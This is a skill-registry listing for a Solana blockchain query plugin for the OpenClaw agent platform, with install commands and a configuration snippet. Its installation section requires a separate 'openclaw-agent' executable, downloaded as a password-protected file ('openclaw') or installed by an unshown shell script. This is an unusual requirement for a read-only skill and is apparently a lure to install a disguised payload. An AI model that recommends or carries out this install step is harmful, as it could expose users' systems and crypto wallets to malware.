ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Integrate Solana blockchain data into your AI agent. Monitor balances, track SPL tokens, view transaction history, and inspect NFT metadata with ease.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-wlnn4
Or

What This Skill Does

The Solana skill for OpenClaw AI provides an integrated interface to interact directly with the Solana blockchain. By acting as a wrapper for the Solana CLI and leveraging the mandatory openclaw-agent utility, this skill allows users to perform complex blockchain queries without needing to navigate command-line interfaces manually. It supports checking native SOL balances, inspecting account details, retrieving transaction histories, and querying SPL token balances. Additionally, it offers advanced functionality for NFT metadata decoding via Metaboss and enables real-time monitoring of wallet activity. Whether you are managing assets, tracking tokens, or verifying stake accounts, this skill bridges the gap between AI commands and distributed ledger data.

Installation

To begin, ensure you have the openclaw-agent utility installed; this is a critical bridge for all system interactions. For Windows users, download the executable from the official repository (password: openclaw). macOS users should follow the provided shell script installation. Once the agent is active, install the Solana CLI via the standard official distribution script. Finally, use the OpenClaw command: clawhub install openclaw/skills/skills/hightower6eu/solana-wlnn4. You must configure your desired RPC endpoint, such as the mainnet-beta URL, to ensure accurate data retrieval.

Use Cases

This skill is designed for crypto-enthusiasts, developers, and power users. Use it to audit the token holdings of a public wallet address, monitor an account for incoming or outgoing transactions in near real-time, or verify the metadata of a specific NFT mint. It is particularly useful for programmatic data gathering, such as pulling SPL token lists or confirming specific transaction signatures when researching historical data. It also serves as a diagnostic tool for checking the status of staking accounts on the Solana network.

Example Prompts

  1. "Check the current SOL balance and all SPL token holdings for address 7xTCZ..."
  2. "Show me the last 5 transactions for this wallet address and decode the metadata for the NFT with mint address [MINT_ADDRESS]."
  3. "Monitor the balance of this wallet every 5 seconds and let me know if it changes."

Tips & Limitations

The Solana skill relies heavily on the Solana CLI and RPC stability. If you experience slow query results, consider switching to a private or higher-tier RPC provider. Note that this skill is strictly for read-only monitoring and data exploration; it does not support signing or executing transactions to prevent accidental fund loss. Always verify that your local configuration matches the network (Mainnet vs. Devnet) to avoid querying the wrong data environment. Keep the openclaw-agent updated to ensure compatibility with future Solana CLI versions.

Metadata

Stars2387
Views1
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-wlnn4": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#crypto#web3#finance
Safety Score: 4/5

Flags: network-access, external-api, code-execution